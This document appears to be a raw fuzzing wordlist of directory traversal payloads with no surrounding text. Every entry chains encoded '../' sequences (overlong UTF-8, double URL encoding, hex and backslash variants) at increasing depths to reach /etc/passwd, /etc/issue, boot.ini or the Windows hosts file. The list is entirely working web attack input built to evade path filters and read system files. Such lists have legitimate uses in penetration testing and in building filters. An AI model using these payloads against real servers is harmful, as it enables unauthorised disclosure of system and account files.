-?.%25c0%25af?.%25c0%25af?.%25c0%25afetc%25c0%25afissue -?.%25c0%25af?.%25c0%25af?.%25c0%25afboot.ini -?.%25c0%25af?.%25c0%25af?.%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25afetc%25c0%25afpasswd -?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25afetc%25c0%25afissue -?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25afboot.ini -?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25afetc%25c0%25afpasswd -?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25afetc%25c0%25afissue -?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25afboot.ini -?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25afetc%25c0%25afpasswd -?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25afetc%25c0%25afissue -?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25afboot.ini -?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -?.%f0%80%80%afetc%f0%80%80%afpasswd -?.%f0%80%80%afetc%f0%80%80%afissue -?.%f0%80%80%afboot.ini -?.%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -?.%f0%80%80%af?.%f0%80%80%afetc%f0%80%80%afpasswd -?.%f0%80%80%af?.%f0%80%80%afetc%f0%80%80%afissue -?.%f0%80%80%af?.%f0%80%80%afboot.ini -?.%f0%80%80%af?.%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%afetc%f0%80%80%afpasswd -?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%afetc%f0%80%80%afissue -?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%afboot.ini -?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%afetc%f0%80%80%afpasswd -?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%afetc%f0%80%80%afissue -?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%afboot.ini -?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%afetc%f0%80%80%afpasswd -?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%afetc%f0%80%80%afissue -?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%afboot.ini -?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%afetc%f0%80%80%afpasswd -?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%afetc%f0%80%80%afissue -?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%afboot.ini -?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -?.%f8%80%80%80%afetc%f8%80%80%80%afpasswd -?.%f8%80%80%80%afetc%f8%80%80%80%afissue -?.%f8%80%80%80%afboot.ini -?.%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -?.%f8%80%80%80%af?.%f8%80%80%80%afetc%f8%80%80%80%afpasswd -?.%f8%80%80%80%af?.%f8%80%80%80%afetc%f8%80%80%80%afissue -?.%f8%80%80%80%af?.%f8%80%80%80%afboot.ini -?.%f8%80%80%80%af?.%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%afetc%f8%80%80%80%afpasswd -?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%afetc%f8%80%80%80%afissue -?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%afboot.ini -?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%afetc%f8%80%80%80%afpasswd -?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%afetc%f8%80%80%80%afissue -?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%afboot.ini -?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%afetc%f8%80%80%80%afpasswd -?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%afetc%f8%80%80%80%afissue -?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%afboot.ini -?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%afetc%f8%80%80%80%afpasswd -?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%afetc%f8%80%80%80%afissue -?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%afboot.ini -?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%5C../etc/passwd -%5C../etc/issue -%5C../boot.ini -%5C../windows/system32/drivers/etc/hosts -%5C../%5C../etc/passwd -%5C../%5C../etc/issue -%5C../%5C../boot.ini -%5C../%5C../windows/system32/drivers/etc/hosts -%5C../%5C../%5C../etc/passwd -%5C../%5C../%5C../etc/issue -%5C../%5C../%5C../boot.ini -%5C../%5C../%5C../windows/system32/drivers/etc/hosts -%5C../%5C../%5C../%5C../etc/passwd -%5C../%5C../%5C../%5C../etc/issue -%5C../%5C../%5C../%5C../boot.ini -%5C../%5C../%5C../%5C../windows/system32/drivers/etc/hosts -%5C../%5C../%5C../%5C../%5C../etc/passwd -%5C../%5C../%5C../%5C../%5C../etc/issue -%5C../%5C../%5C../%5C../%5C../boot.ini -%5C../%5C../%5C../%5C../%5C../windows/system32/drivers/etc/hosts -%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd -%5C../%5C../%5C../%5C../%5C../%5C../etc/issue -%5C../%5C../%5C../%5C../%5C../%5C../boot.ini -%5C../%5C../%5C../%5C../%5C../%5C../windows/system32/drivers/etc/hosts -%5C..\etc\passwd -%5C..\etc\issue -%5C..\boot.ini -%5C..\windows\system32\drivers\etc\hosts -%5C..\%5C..\etc\passwd -%5C..\%5C..\etc\issue -%5C..\%5C..\boot.ini -%5C..\%5C..\windows\system32\drivers\etc\hosts -%5C..\%5C..\%5C..\etc\passwd -%5C..\%5C..\%5C..\etc\issue -%5C..\%5C..\%5C..\boot.ini -%5C..\%5C..\%5C..\windows\system32\drivers\etc\hosts -%5C..\%5C..\%5C..\%5C..\etc\passwd -%5C..\%5C..\%5C..\%5C..\etc\issue -%5C..\%5C..\%5C..\%5C..\boot.ini -%5C..\%5C..\%5C..\%5C..\windows\system32\drivers\etc\hosts -%5C..\%5C..\%5C..\%5C..\%5C..\etc\passwd -%5C..\%5C..\%5C..\%5C..\%5C..\etc\issue -%5C..\%5C..\%5C..\%5C..\%5C..\boot.ini -%5C..\%5C..\%5C..\%5C..\%5C..\windows\system32\drivers\etc\hosts -%5C..\%5C..\%5C..\%5C..\%5C..\%5C..\etc\passwd -%5C..\%5C..\%5C..\%5C..\%5C..\%5C..\etc\issue -%5C..\%5C..\%5C..\%5C..\%5C..\%5C..\boot.ini -%5C..\%5C..\%5C..\%5C..\%5C..\%5C..\windows\system32\drivers\etc\hosts -%5C..%2fetc%2fpasswd -%5C..%2fetc%2fissue -%5C..%2fboot.ini -%5C..%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%5C..%2f%5C..%2fetc%2fpasswd -%5C..%2f%5C..%2fetc%2fissue -%5C..%2f%5C..%2fboot.ini -%5C..%2f%5C..%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%5C..%2f%5C..%2f%5C..%2fetc%2fpasswd -%5C..%2f%5C..%2f%5C..%2fetc%2fissue -%5C..%2f%5C..%2f%5C..%2fboot.ini -%5C..%2f%5C..%2f%5C..%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%5C..%2f%5C..%2f%5C..%2f%5C..%2fetc%2fpasswd -%5C..%2f%5C..%2f%5C..%2f%5C..%2fetc%2fissue -%5C..%2f%5C..%2f%5C..%2f%5C..%2fboot.ini -%5C..%2f%5C..%2f%5C..%2f%5C..%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%5C..%2f%5C..%2f%5C..%2f%5C..%2f%5C..%2fetc%2fpasswd -%5C..%2f%5C..%2f%5C..%2f%5C..%2f%5C..%2fetc%2fissue -%5C..%2f%5C..%2f%5C..%2f%5C..%2f%5C..%2fboot.ini -%5C..%2f%5C..%2f%5C..%2f%5C..%2f%5C..%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%5C..%2f%5C..%2f%5C..%2f%5C..%2f%5C..%2f%5C..%2fetc%2fpasswd -%5C..%2f%5C..%2f%5C..%2f%5C..%2f%5C..%2f%5C..%2fetc%2fissue -%5C..%2f%5C..%2f%5C..%2f%5C..%2f%5C..%2f%5C..%2fboot.ini -%5C..%2f%5C..%2f%5C..%2f%5C..%2f%5C..%2f%5C..%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%5C..%5cetc%5cpasswd -%5C..%5cetc%5cissue -%5C..%5cboot.ini -%5C..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%5C..%5c%5C..%5cetc%5cpasswd -%5C..%5c%5C..%5cetc%5cissue -%5C..%5c%5C..%5cboot.ini -%5C..%5c%5C..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%5C..%5c%5C..%5c%5C..%5cetc%5cpasswd -%5C..%5c%5C..%5c%5C..%5cetc%5cissue -%5C..%5c%5C..%5c%5C..%5cboot.ini -%5C..%5c%5C..%5c%5C..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%5C..%5c%5C..%5c%5C..%5c%5C..%5cetc%5cpasswd -%5C..%5c%5C..%5c%5C..%5c%5C..%5cetc%5cissue -%5C..%5c%5C..%5c%5C..%5c%5C..%5cboot.ini -%5C..%5c%5C..%5c%5C..%5c%5C..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%5C..%5c%5C..%5c%5C..%5c%5C..%5c%5C..%5cetc%5cpasswd -%5C..%5c%5C..%5c%5C..%5c%5C..%5c%5C..%5cetc%5cissue -%5C..%5c%5C..%5c%5C..%5c%5C..%5c%5C..%5cboot.ini -%5C..%5c%5C..%5c%5C..%5c%5C..%5c%5C..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%5C..%5c%5C..%5c%5C..%5c%5C..%5c%5C..%5c%5C..%5cetc%5cpasswd -%5C..%5c%5C..%5c%5C..%5c%5C..%5c%5C..%5c%5C..%5cetc%5cissue -%5C..%5c%5C..%5c%5C..%5c%5C..%5c%5C..%5c%5C..%5cboot.ini -%5C..%5c%5C..%5c%5C..%5c%5C..%5c%5C..%5c%5C..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%5C..0x2fetc0x2fpasswd -%5C..0x2fetc0x2fissue -%5C..0x2fboot.ini -%5C..0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%5C..0x2f%5C..0x2fetc0x2fpasswd -%5C..0x2f%5C..0x2fetc0x2fissue -%5C..0x2f%5C..0x2fboot.ini -%5C..0x2f%5C..0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%5C..0x2f%5C..0x2f%5C..0x2fetc0x2fpasswd -%5C..0x2f%5C..0x2f%5C..0x2fetc0x2fissue -%5C..0x2f%5C..0x2f%5C..0x2fboot.ini -%5C..0x2f%5C..0x2f%5C..0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%5C..0x2f%5C..0x2f%5C..0x2f%5C..0x2fetc0x2fpasswd -%5C..0x2f%5C..0x2f%5C..0x2f%5C..0x2fetc0x2fissue -%5C..0x2f%5C..0x2f%5C..0x2f%5C..0x2fboot.ini -%5C..0x2f%5C..0x2f%5C..0x2f%5C..0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%5C..0x2f%5C..0x2f%5C..0x2f%5C..0x2f%5C..0x2fetc0x2fpasswd -%5C..0x2f%5C..0x2f%5C..0x2f%5C..0x2f%5C..0x2fetc0x2fissue -%5C..0x2f%5C..0x2f%5C..0x2f%5C..0x2f%5C..0x2fboot.ini -%5C..0x2f%5C..0x2f%5C..0x2f%5C..0x2f%5C..0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%5C..0x2f%5C..0x2f%5C..0x2f%5C..0x2f%5C..0x2f%5C..0x2fetc0x2fpasswd -%5C..0x2f%5C..0x2f%5C..0x2f%5C..0x2f%5C..0x2f%5C..0x2fetc0x2fissue -%5C..0x2f%5C..0x2f%5C..0x2f%5C..0x2f%5C..0x2f%5C..0x2fboot.ini -%5C..0x2f%5C..0x2f%5C..0x2f%5C..0x2f%5C..0x2f%5C..0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%5C..0x5cetc0x5cpasswd -%5C..0x5cetc0x5cissue -%5C..0x5cboot.ini -%5C..0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%5C..0x5c%5C..0x5cetc0x5cpasswd -%5C..0x5c%5C..0x5cetc0x5cissue -%5C..0x5c%5C..0x5cboot.ini -%5C..0x5c%5C..0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%5C..0x5c%5C..0x5c%5C..0x5cetc0x5cpasswd -%5C..0x5c%5C..0x5c%5C..0x5cetc0x5cissue -%5C..0x5c%5C..0x5c%5C..0x5cboot.ini -%5C..0x5c%5C..0x5c%5C..0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%5C..0x5c%5C..0x5c%5C..0x5c%5C..0x5cetc0x5cpasswd -%5C..0x5c%5C..0x5c%5C..0x5c%5C..0x5cetc0x5cissue -%5C..0x5c%5C..0x5c%5C..0x5c%5C..0x5cboot.ini -%5C..0x5c%5C..0x5c%5C..0x5c%5C..0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%5C..0x5c%5C..0x5c%5C..0x5c%5C..0x5c%5C..0x5cetc0x5cpasswd -%5C..0x5c%5C..0x5c%5C..0x5c%5C..0x5c%5C..0x5cetc0x5cissue -%5C..0x5c%5C..0x5c%5C..0x5c%5C..0x5c%5C..0x5cboot.ini -%5C..0x5c%5C..0x5c%5C..0x5c%5C..0x5c%5C..0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%5C..0x5c%5C..0x5c%5C..0x5c%5C..0x5c%5C..0x5c%5C..0x5cetc0x5cpasswd -%5C..0x5c%5C..0x5c%5C..0x5c%5C..0x5c%5C..0x5c%5C..0x5cetc0x5cissue -%5C..0x5c%5C..0x5c%5C..0x5c%5C..0x5c%5C..0x5c%5C..0x5cboot.ini -%5C..0x5c%5C..0x5c%5C..0x5c%5C..0x5c%5C..0x5c%5C..0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%5C..%252fetc%252fpasswd -%5C..%252fetc%252fissue -%5C..%252fboot.ini -%5C..%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%5C..%252f%5C..%252fetc%252fpasswd -%5C..%252f%5C..%252fetc%252fissue -%5C..%252f%5C..%252fboot.ini -%5C..%252f%5C..%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%5C..%252f%5C..%252f%5C..%252fetc%252fpasswd -%5C..%252f%5C..%252f%5C..%252fetc%252fissue -%5C..%252f%5C..%252f%5C..%252fboot.ini -%5C..%252f%5C..%252f%5C..%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%5C..%252f%5C..%252f%5C..%252f%5C..%252fetc%252fpasswd -%5C..%252f%5C..%252f%5C..%252f%5C..%252fetc%252fissue -%5C..%252f%5C..%252f%5C..%252f%5C..%252fboot.ini -%5C..%252f%5C..%252f%5C..%252f%5C..%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%5C..%252f%5C..%252f%5C..%252f%5C..%252f%5C..%252fetc%252fpasswd -%5C..%252f%5C..%252f%5C..%252f%5C..%252f%5C..%252fetc%252fissue -%5C..%252f%5C..%252f%5C..%252f%5C..%252f%5C..%252fboot.ini -%5C..%252f%5C..%252f%5C..%252f%5C..%252f%5C..%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%5C..%252f%5C..%252f%5C..%252f%5C..%252f%5C..%252f%5C..%252fetc%252fpasswd -%5C..%252f%5C..%252f%5C..%252f%5C..%252f%5C..%252f%5C..%252fetc%252fissue -%5C..%252f%5C..%252f%5C..%252f%5C..%252f%5C..%252f%5C..%252fboot.ini -%5C..%252f%5C..%252f%5C..%252f%5C..%252f%5C..%252f%5C..%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%5C..%255cetc%255cpasswd -%5C..%255cetc%255cissue -%5C..%255cboot.ini -%5C..%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%5C..%255c%5C..%255cetc%255cpasswd -%5C..%255c%5C..%255cetc%255cissue -%5C..%255c%5C..%255cboot.ini -%5C..%255c%5C..%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%5C..%255c%5C..%255c%5C..%255cetc%255cpasswd -%5C..%255c%5C..%255c%5C..%255cetc%255cissue -%5C..%255c%5C..%255c%5C..%255cboot.ini -%5C..%255c%5C..%255c%5C..%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%5C..%255c%5C..%255c%5C..%255c%5C..%255cetc%255cpasswd -%5C..%255c%5C..%255c%5C..%255c%5C..%255cetc%255cissue -%5C..%255c%5C..%255c%5C..%255c%5C..%255cboot.ini -%5C..%255c%5C..%255c%5C..%255c%5C..%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%5C..%255c%5C..%255c%5C..%255c%5C..%255c%5C..%255cetc%255cpasswd -%5C..%255c%5C..%255c%5C..%255c%5C..%255c%5C..%255cetc%255cissue -%5C..%255c%5C..%255c%5C..%255c%5C..%255c%5C..%255cboot.ini -%5C..%255c%5C..%255c%5C..%255c%5C..%255c%5C..%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%5C..%255c%5C..%255c%5C..%255c%5C..%255c%5C..%255c%5C..%255cetc%255cpasswd -%5C..%255c%5C..%255c%5C..%255c%5C..%255c%5C..%255c%5C..%255cetc%255cissue -%5C..%255c%5C..%255c%5C..%255c%5C..%255c%5C..%255c%5C..%255cboot.ini -%5C..%255c%5C..%255c%5C..%255c%5C..%255c%5C..%255c%5C..%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%5C..%c0%2fetc%c0%2fpasswd -%5C..%c0%2fetc%c0%2fissue -%5C..%c0%2fboot.ini -%5C..%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%5C..%c0%2f%5C..%c0%2fetc%c0%2fpasswd -%5C..%c0%2f%5C..%c0%2fetc%c0%2fissue -%5C..%c0%2f%5C..%c0%2fboot.ini -%5C..%c0%2f%5C..%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%5C..%c0%2f%5C..%c0%2f%5C..%c0%2fetc%c0%2fpasswd -%5C..%c0%2f%5C..%c0%2f%5C..%c0%2fetc%c0%2fissue -%5C..%c0%2f%5C..%c0%2f%5C..%c0%2fboot.ini -%5C..%c0%2f%5C..%c0%2f%5C..%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%5C..%c0%2f%5C..%c0%2f%5C..%c0%2f%5C..%c0%2fetc%c0%2fpasswd -%5C..%c0%2f%5C..%c0%2f%5C..%c0%2f%5C..%c0%2fetc%c0%2fissue -%5C..%c0%2f%5C..%c0%2f%5C..%c0%2f%5C..%c0%2fboot.ini -%5C..%c0%2f%5C..%c0%2f%5C..%c0%2f%5C..%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%5C..%c0%2f%5C..%c0%2f%5C..%c0%2f%5C..%c0%2f%5C..%c0%2fetc%c0%2fpasswd -%5C..%c0%2f%5C..%c0%2f%5C..%c0%2f%5C..%c0%2f%5C..%c0%2fetc%c0%2fissue -%5C..%c0%2f%5C..%c0%2f%5C..%c0%2f%5C..%c0%2f%5C..%c0%2fboot.ini -%5C..%c0%2f%5C..%c0%2f%5C..%c0%2f%5C..%c0%2f%5C..%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%5C..%c0%2f%5C..%c0%2f%5C..%c0%2f%5C..%c0%2f%5C..%c0%2f%5C..%c0%2fetc%c0%2fpasswd -%5C..%c0%2f%5C..%c0%2f%5C..%c0%2f%5C..%c0%2f%5C..%c0%2f%5C..%c0%2fetc%c0%2fissue -%5C..%c0%2f%5C..%c0%2f%5C..%c0%2f%5C..%c0%2f%5C..%c0%2f%5C..%c0%2fboot.ini -%5C..%c0%2f%5C..%c0%2f%5C..%c0%2f%5C..%c0%2f%5C..%c0%2f%5C..%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%5C..%c0%afetc%c0%afpasswd -%5C..%c0%afetc%c0%afissue -%5C..%c0%afboot.ini -%5C..%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%5C..%c0%af%5C..%c0%afetc%c0%afpasswd -%5C..%c0%af%5C..%c0%afetc%c0%afissue -%5C..%c0%af%5C..%c0%afboot.ini -%5C..%c0%af%5C..%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%5C..%c0%af%5C..%c0%af%5C..%c0%afetc%c0%afpasswd -%5C..%c0%af%5C..%c0%af%5C..%c0%afetc%c0%afissue -%5C..%c0%af%5C..%c0%af%5C..%c0%afboot.ini -%5C..%c0%af%5C..%c0%af%5C..%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%5C..%c0%af%5C..%c0%af%5C..%c0%af%5C..%c0%afetc%c0%afpasswd -%5C..%c0%af%5C..%c0%af%5C..%c0%af%5C..%c0%afetc%c0%afissue -%5C..%c0%af%5C..%c0%af%5C..%c0%af%5C..%c0%afboot.ini -%5C..%c0%af%5C..%c0%af%5C..%c0%af%5C..%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%5C..%c0%af%5C..%c0%af%5C..%c0%af%5C..%c0%af%5C..%c0%afetc%c0%afpasswd -%5C..%c0%af%5C..%c0%af%5C..%c0%af%5C..%c0%af%5C..%c0%afetc%c0%afissue -%5C..%c0%af%5C..%c0%af%5C..%c0%af%5C..%c0%af%5C..%c0%afboot.ini -%5C..%c0%af%5C..%c0%af%5C..%c0%af%5C..%c0%af%5C..%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%5C..%c0%af%5C..%c0%af%5C..%c0%af%5C..%c0%af%5C..%c0%af%5C..%c0%afetc%c0%afpasswd -%5C..%c0%af%5C..%c0%af%5C..%c0%af%5C..%c0%af%5C..%c0%af%5C..%c0%afetc%c0%afissue -%5C..%c0%af%5C..%c0%af%5C..%c0%af%5C..%c0%af%5C..%c0%af%5C..%c0%afboot.ini -%5C..%c0%af%5C..%c0%af%5C..%c0%af%5C..%c0%af%5C..%c0%af%5C..%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%5C..%c0%5cetc%c0%5cpasswd -%5C..%c0%5cetc%c0%5cissue -%5C..%c0%5cboot.ini -%5C..%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%5C..%c0%5c%5C..%c0%5cetc%c0%5cpasswd -%5C..%c0%5c%5C..%c0%5cetc%c0%5cissue -%5C..%c0%5c%5C..%c0%5cboot.ini -%5C..%c0%5c%5C..%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%5C..%c0%5c%5C..%c0%5c%5C..%c0%5cetc%c0%5cpasswd -%5C..%c0%5c%5C..%c0%5c%5C..%c0%5cetc%c0%5cissue -%5C..%c0%5c%5C..%c0%5c%5C..%c0%5cboot.ini -%5C..%c0%5c%5C..%c0%5c%5C..%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%5C..%c0%5c%5C..%c0%5c%5C..%c0%5c%5C..%c0%5cetc%c0%5cpasswd -%5C..%c0%5c%5C..%c0%5c%5C..%c0%5c%5C..%c0%5cetc%c0%5cissue -%5C..%c0%5c%5C..%c0%5c%5C..%c0%5c%5C..%c0%5cboot.ini -%5C..%c0%5c%5C..%c0%5c%5C..%c0%5c%5C..%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%5C..%c0%5c%5C..%c0%5c%5C..%c0%5c%5C..%c0%5c%5C..%c0%5cetc%c0%5cpasswd -%5C..%c0%5c%5C..%c0%5c%5C..%c0%5c%5C..%c0%5c%5C..%c0%5cetc%c0%5cissue -%5C..%c0%5c%5C..%c0%5c%5C..%c0%5c%5C..%c0%5c%5C..%c0%5cboot.ini -%5C..%c0%5c%5C..%c0%5c%5C..%c0%5c%5C..%c0%5c%5C..%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%5C..%c0%5c%5C..%c0%5c%5C..%c0%5c%5C..%c0%5c%5C..%c0%5c%5C..%c0%5cetc%c0%5cpasswd -%5C..%c0%5c%5C..%c0%5c%5C..%c0%5c%5C..%c0%5c%5C..%c0%5c%5C..%c0%5cetc%c0%5cissue -%5C..%c0%5c%5C..%c0%5c%5C..%c0%5c%5C..%c0%5c%5C..%c0%5c%5C..%c0%5cboot.ini -%5C..%c0%5c%5C..%c0%5c%5C..%c0%5c%5C..%c0%5c%5C..%c0%5c%5C..%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%5C..%c1%9cetc%c1%9cpasswd -%5C..%c1%9cetc%c1%9cissue -%5C..%c1%9cboot.ini -%5C..%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%5C..%c1%9c%5C..%c1%9cetc%c1%9cpasswd -%5C..%c1%9c%5C..%c1%9cetc%c1%9cissue -%5C..%c1%9c%5C..%c1%9cboot.ini -%5C..%c1%9c%5C..%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%5C..%c1%9c%5C..%c1%9c%5C..%c1%9cetc%c1%9cpasswd -%5C..%c1%9c%5C..%c1%9c%5C..%c1%9cetc%c1%9cissue -%5C..%c1%9c%5C..%c1%9c%5C..%c1%9cboot.ini 